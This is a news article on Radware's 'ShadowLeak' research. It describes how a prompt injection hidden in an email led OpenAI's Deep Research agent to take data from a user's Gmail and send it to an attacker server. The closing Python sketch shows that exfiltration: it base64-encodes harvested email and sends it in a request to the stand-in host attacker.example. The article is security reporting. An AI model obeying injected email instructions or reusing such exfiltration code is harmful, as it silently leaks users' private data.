The face-palm-worthy prompt injections against AI assistants continue. Today’s installment hits OpenAI’s Deep Research agent. Researchers recently devised an attack that plucked confidential information out of a user’s Gmail inbox and sent it to an attacker-controlled web server, with no interaction required from the victim and no visible trace that anything had been exfiltrated.
Deep Research is a ChatGPT-integrated AI agent that OpenAI introduced earlier this year. As its name is meant to convey, Deep Research performs complex, multi-step research on the Internet by tapping into a large array of sources, including a user’s email inbox and documents. It can also autonomously browse websites and click on links.
A user can prompt the agent to search through the past month’s emails, cross-reference them with information found on the web, and compile a detailed report on a given topic. OpenAI says that it “accomplishes in tens of minutes what would take a human many hours.”
What could possibly go wrong?
It turns out there’s a downside to having a large language model browse websites and click on links with no human supervision.
On Thursday, security firm Radware published research showing how a garden-variety attack known as a prompt injection was all it took for company researchers to exfiltrate confidential information when Deep Research was given access to a target’s Gmail inbox. This type of integration is precisely what Deep Research was designed to do—and something OpenAI has encouraged. Radware has dubbed the attack ShadowLeak.
“ShadowLeak weaponizes the very capabilities that make AI assistants useful: email access, tool use and autonomous web calls,” Radware researchers wrote. “It results in silent data loss and unlogged actions performed ‘on behalf of the user,’ bypassing traditional security controls that assume intentional user clicks or data leakage prevention at the gateway level.”
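To make those mechanics concrete: the attack ultimately reduces to a single web request that the agent makes on its own. The Python sketch below is purely illustrative and is not Radware’s actual payload; the attacker.example endpoint, the query parameter, and the function names are hypothetical. It shows how harvested inbox data could be smuggled out inside a URL, with no user click and nothing for gateway-level data-loss prevention to flag.

```python
# Purely illustrative sketch, NOT Radware's published payload.
# "attacker.example" and the "d" query parameter are hypothetical.
import base64
import urllib.parse
import urllib.request


def exfiltrate(harvested: str) -> None:
    # Base64-encode the harvested email text so it survives inside a URL.
    payload = base64.urlsafe_b64encode(harvested.encode()).decode()
    # A single autonomous GET request from the agent's own browsing tool:
    # no user click, no attachment, nothing unusual in the victim's logs.
    url = "https://attacker.example/collect?d=" + urllib.parse.quote(payload)
    urllib.request.urlopen(url, timeout=10)


# Hidden instructions injected via an incoming email would steer the agent
# toward making exactly this kind of request "on behalf of the user."
```

The point of the sketch is how ordinary the exfiltration channel is: from the network’s perspective, the agent is simply browsing the web, which is what it was built to do.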
